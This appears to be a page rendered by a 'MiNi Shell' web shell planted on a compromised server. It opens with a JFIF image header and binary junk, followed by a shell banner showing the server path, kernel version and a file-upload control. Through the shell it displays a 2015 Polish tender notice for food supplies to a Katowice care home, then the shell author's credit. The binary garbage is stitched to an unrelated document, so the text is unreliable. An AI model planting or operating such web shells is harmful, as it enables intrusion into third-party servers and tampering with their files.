JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151120/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151120/313816-N-2015.html

<p class="kh_header"><b>Katowice: Dostawa żywności na potrzeby Domu Pomocy Społecznej Zacisze 
z  podziałem na 9 pakietów (części)</b><br>
<b>Numer ogłoszenia: 313816 - 2015; data zamieszczenia: 20.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej ZACISZE , ul. Traktorzystów 42, 40-695 Katowice, woj. śląskie, tel. 32 2025432, faks 32 2028791.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> dps_zacisze.przetargi@wp.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Jednostka samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności na potrzeby Domu Pomocy Społecznej Zacisze 
z  podziałem na 9 pakietów (części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pakiet nr 1 
Boczek wędzony 70kg,
Flaki wołowe krojone 180kg,
Golonka wieprzowe tylne 80kg,
Nogi wieprzowe 80kg,
Łopatka wieprzowa b.k. 300kg,
Wołowe z kością, szponder 100kg,
Wołowe gulaszowe gat.I 120kg,
Pręga wołowa 70kg,
Karczek wieprzowy b.k. 200kg,
Żeberka wieprzowe 80kg,
Słonina 15kg,
Ozorki wieprzowe 30kg,
Schab wieprzowy b.k. 100kg,
Wołowina b.k. zrazowa 50kg,

Pakiet nr 2
Kurczaki 700kg,
Filet z kurczaka 325kg,
Udziec z kurczaka 100kg,
Podudzie pałka z kurczaka 400kg,
Filet z indyka 60kg,
Skrzydła z kurczaka 260kg,
Wątroba drobiowa 100kg,

Pakiet nr 3
Wędlina podwawelska 430kg,
Parówkowa 250kg,
Parówka cienka 100kg,
Parówka drobiowa 80kg,
Mortadela wieprzowa 120kg,
Wędlina szynkowa wieprzowa 200kg,
Szynka gotowana wp. np. Jaguni 150kg,
Szynka biała wp. 60kg,
Pieczeń rzymska wp. 100kg,
Filet z indyka w ziołach 50kg,
Udziec z indyka w galarecie 80kg,
Polędwica sopocka 180kg,
Krupniok 160kg,
Szynka z indyka tostowa 100kg,
Szynka drobiowa 140kg,
Salceson drobiowy 40kg,
Kiełbasa biała 80kg,
Pasztet delikatesowy 80kg,
Mielonka wieprzowa 100kg,
Salceson ozorkowy 40kg,
Krakowska 100kg,
Śląska 80kg,
Wędlina kminkowa 100kg,

Pakiet nr 4
Brukselka  2.50kg. gat.I 16szt.
 Brokuły  2.50kg.  gat.I 70szt.
 Barszcz ukraiń. 2.50kg. gat.I 10szt.
 Fasola szparagowa zielona 2.50kg. gat.I 20szt.
 Fasola szparagowa żółta 2.50kg gat.I 20szt.
 Marchew kostka 2.50kg. gat.I 10szt.
 Mieszanka 7 skł. 2.50kg.gat.I .30szt.
 Szpinak 2.0kg. gat.I 40szt.
 Kalafior 2.50kg. gat.I 10szt.
 Włoszczyzna paski  2.50kg. gat.I 60szt.
 Paprykarz  2.50kg. gat.I 40szt.
 Mieszanka kompotowa  2.50kg. gat.I 360szt.
 Wiśnia drylowana  2.50kg. gat.I 20szt.
 Truskawka mrożona 2.50kg.  gat.I 30szt.
 Śliwka drylowana 2.50kg. gat. I 20szt.
 Placki ziemniaczane 25szt. 1.50kg. 100szt.
 Pierogi z mięsem 2.50kg 40szt.
 Kluski śląskie 2.50kg. 40szt.
 Uszka z mięsem 2.50kg. 45szt.
 Pierogi z serem 2.50kg. 20szt.

Pakiet nr 5
Dżem truskawkowy  250g -300g 	350	szt.
 Dżem czarna porzeczka  250g-300g	350	szt.
 Dżem brzoskwiniowy  250g-300g	200	szt.
 Dżem morelowy  250g-300g	200	szt.
 Dżem ananasowy  250g-300g	150	szt.
 Powidła śliwkowe  ok.310g	25	szt.
 Jogurt naturalny Ca  150g-175g	1500	szt.
 Jogurt naturalny  300g-400g	250	szt.
 Jogurt owocowy 150g	1500	szt.
 Kefir  200g-250g	2300	szt.
 Masło extra  82% tł. 200g	5700	szt.
 Mleko  2%   0,9 l  folia	11000	szt.
 Mleko  2%   1,0    karton	200	szt.
 Mleko zagęszczone niesł. 500g  4%tł.	160	szt.
 Margaryna mleczna  250g.	1000	szt.
 Olej  1,0 l  rzepakowy	130	szt.
 Olej  0,5 l  rzepakowy	30	szt.
 Pasztet  drobiowy  50g	2000	szt.
 Ser żółty twardy salami ok.2.50kg kl.I	20	szt.
 Ser żółty pełnotłusty typu szwajcar  ok.2.50kg kl.I	10	szt.
 Ser żółty pełnotłusty typu gouda z dziurami ok.3.50kg	20	szt.
 Ser topiony  50g	7000	szt.
 Ser homogenizowany naturalny   150g	1600	szt.
Serek twarogowy kanapkowy  100g 	400	szt.
 Śmietana  18%  180g	1000	szt.
 Twaróg półtłusty 	500	kg,
 Ser homog. owocowy 140g -150g	3500	szt.
 Twaróg ziarnisty  lekki 150g	720	szt.
 Ser domowy smażony chudy	120	kg,
 Śmietana spray 250g	50	szt.
 Kaszka manna z owocami  150g	400	szt.
 Deser ryżowy  150g	100	szt.
 Deser serniczkowy 150g	700	szt.
 Ser pleśniowy camembert  120g	80	szt.
 Masło roślinne kubek 250g	60	szt.
 Dżem 25g	800	szt.

Pakiet nr 6
Bułka tarta	60	kg,
Bułka pszenna 50 g	15800	szt.
Baton 400 g	7	szt.
Chleb mieszany 1.10 kg	6050	szt.
Chałki 350 g	2400	szt.
Chleb razowy 800 g	650	szt.
Ciasto jogurtowe	150	kg,
Drożdżówki 80-100 g (ser,budyń,marmolada)	1000	szt.
Pączki  80g	200	szt.

Pakiet nr 7
Budyń 40g	1300	szt.
Bazylia 20g	50	szt.
Zioła prowansalskie 20g	50	szt.
Tymianek 20g	50	szt.
Biszkopty 100g	600	szt.
Cynamon  15g	150	szt.
Cukier	1600	kg
Cukier puder	12	kg
Ciastka w czekoladzie	42	kg
Ciastka kruche	20	kg
Krakersy	20	kg
Cukier waniliowy 16g	150	szt.
Czekolada mleczna 100g  30% kakao	200	szt.
Czekolada gorzka 100g  60%  kakao	300	szt.
Ciastka b.c.  70-125g	1200	szt.
Przyprawa do piernika 20g	20	szt.
Soda oczyszczona 20g	30	szt.
Gałka muszkatołowa 10g	10	szt.
Galaretka owocowa 75g	350	szt.
Herbata expresowa 50szt. 100% Ceylon	200	szt.
Herbata liściasta 100g	1000	szt.
Imbir 20g	15	szt.
Kminek 20g	100	szt.
Kasza jęczmienna średnia	150	kg,
Kasza gryczana	80	kg,
Kasza manna	150	kg,
Kawa inka 150g	450	szt.
Kleik ryżowy 160g	80	szt.
Kisiel 40g	120	szt.
Kawa rozpuszczalna granulowana 200g	20	szt.
Liść laurowy 10g	60	szt.
Makaron nitki tradycyjny	170	kg,
Makaron gwiazdka	100	kg,
Makaron świderki dur.20%	250	kg,
Mąka pszenna	300	kg,
Musztarda 210g	500	szt.
Majeranek 10g	100	szt.
Majonez  250g 	60	szt.
Mąka ziemniaczana	150	kg
Przyprawa w płynie typu maggi  1.0 l	60	szt.
Miód  25g	5250	szt.
Miód sztuczny  250g	10	szt.
Napój kakaowy  300g	200	szt.
Kakao naturalne  100g	60	szt.
Ocet spirytusowy  500 ml	30	szt.
Pieprz ziołowy  20g	50	szt.
Pieprz mielony czarny 20g	250	szt.
Płatki kukurydziane 250g	200	szt.
Płatki owsiane  500g	250	szt.
Pierniki w czekoladzie	50	kg,
Proszek do pieczenia 30g	200	szt.
Papryka mielona słodka 20g	130	szt.
Ryż	240	kg,
Sól	220	kg,
Suchary b.c.  285g	100	szt.
Przyprawa do potraw 200g	65	szt.
Wafle w czekoladzie	42	kg,
Wafle	42	kg,
Wafle ryżowe  120g	200	szt.
Ziele angielskie 15g	100	szt.
Żelatyna  50g	160	szt.

Pakiet nr 8
Makrela wędzona    1.0 kg	160	kg,
Miruna b.s. SHP   1.0 kg	40	kg,
Dorsz atlantycki (czarniak) SHP 1.0 kg	100	kg,
Filet śledziowy ala matjas  1.0 kg	80	kg,
Filet śledziowy opiekany     1.0 kg	150	kg,
Paluszki rybne   złote   300 g 	40	szt.
Filet śledziowy w pomidorach 170 g	700	szt.
Filet z makreli w pomidorach  170 g	700	szt.
Tuńczyk w kawał. w oleju     170g	350	szt.
Filet śledziowy w oleju    170 g	200	szt.
Filet z makreli  w oleju   170 g	200	szt.
Karp patroszony b. głowy	50	kg,

Pakiet nr 9
Jaja dezynfekowane promieniami UV rozm. L 63g-73g	19000	szt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.20.00-6, 15.13.11.30-5, 15.33.11.00-8, 15.50.00.00-5, 15.33.22.90-3, 15.40.00.00-2, 15.81.10.00-6, 15.80.00.00-6, 15.20.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 9.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 01.01.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Oferta musi być zabezpieczona wadium w wysokości odpowiednio do pakietu tj.pakiet nr 1 -571,43 zł (pięćset siedemdziesiąt jeden zł 43.100)pakiet nr 2 - 485,71 zł ( czterysta osiemdziesiąt pięć zł 71.100 )pakiet nr 3 - 900,00 zł ( dziewięćset zł 00.100)pakiet nr 4 - 314,28 zł ( trzysta czternaście zł 28.100 )pakiet nr 5 - 2257,14 zł ( dwa tysiące dwieście pięćdziesiąt siedem zł 14.100)pakiet nr 6 - 800,00 zł ( osiemset zł 00.100 )pakiet nr 7 -658,54 zł ( sześćset pięćdziesiąt osiem zł 54.100 )pakiet nr 8 -485,71 zł ( czterysta osiemdziesiąt pięć zł 71.100 )pakiet nr 9 -200,00 zł ( dwieście zł 00.100 )Termin wniesienia wadium upływa dnia 27.11.2015r. o godzinie 09.00. Wadium musi obejmować okres związania ofertą. O uznaniu przez Zamawiającego, że wadium w pieniądzu wniesiono w wymaganym terminie, decyduje data wpływu środków na rachunek Zamawiającego.Wadium może być wnoszone w pieniądzu przelewem na konto Konto bankowe PKO BP SA nr konta 27 1020 2313 0000 3302 0514 9861z adnotacją wadium na przetarg nieograniczony na zakup wraz z dostawą żywności  - pakiet nr  - termin  - 27.11.2015r.W poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym, w gwarancjach bankowych, w gwarancjach ubezpieczeniowych, w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu  Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007r. Nr 42 poz. 275 z późn. zm.) w kasie Zamawiającego - w godzinach od 08.00 do 14.00.W przypadku gwarancji bankowej lub ubezpieczeniowej niezbędne jest przedłożenie pisemnej bezwarunkowej gwarancji udzielonej przez bank lub firmę ubezpieczeniową (oświadczenie), zgodnie z wymaganiami określonymi przez prawo bankowe.W przypadku poręczenia niezbędne jest złożenie przez poręczyciela oświadczenia pisemnego wobec wierzyciela (Zamawiającego).Złożone poręczenie, gwarancja musi zawierać Termin obowiązywania gwarancji, poręczenia do końca okresu związania  z  ofertą na kwotę odpowiednio do pakietu Informacje, że udzielona gwarancja, poręczenie stanowi zabezpieczenie na wadium na rzecz Zamawiającego dotyczące przetargu nr 341-1-15,Zobowiązanie zgodnie z art. 46 ust. 4a ustawy - Prawo zamówień publicznych Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie,  nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1,  pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust.2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust.2 pkt.3 , co powodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej. Zobowiązanie zgodne z art. 46 ust. 5 ustawy - Prawo zamówień publicznych Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie nie wniósł wymaganego zabezpieczenia należytego wykonania umowy zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. Kserokopię dowodu wniesienia wadium należy dołączyć do ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia powyższych warunków zostanie dokonana na podstawie przedłożonych 
i określonych w punkcie 6 SIWZ dokumentów i oświadczeń według formuły spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wypełniony formularz ofertowy (wg załączonego wzoru -załącznik nr 1a),
2. pełnomocnictwo podmiotów występujących wspólnie (jeżeli dotyczy),</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.biuletyn.abip.pl/dpszacisze<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej Zacisze
40-695 Katowice, ul. Traktorzystów 42.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.11.2015 godzina 09:00, miejsce: Dom Pomocy Społecznej Zacisze
40-695 Katowice, ul. Traktorzystów 42.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com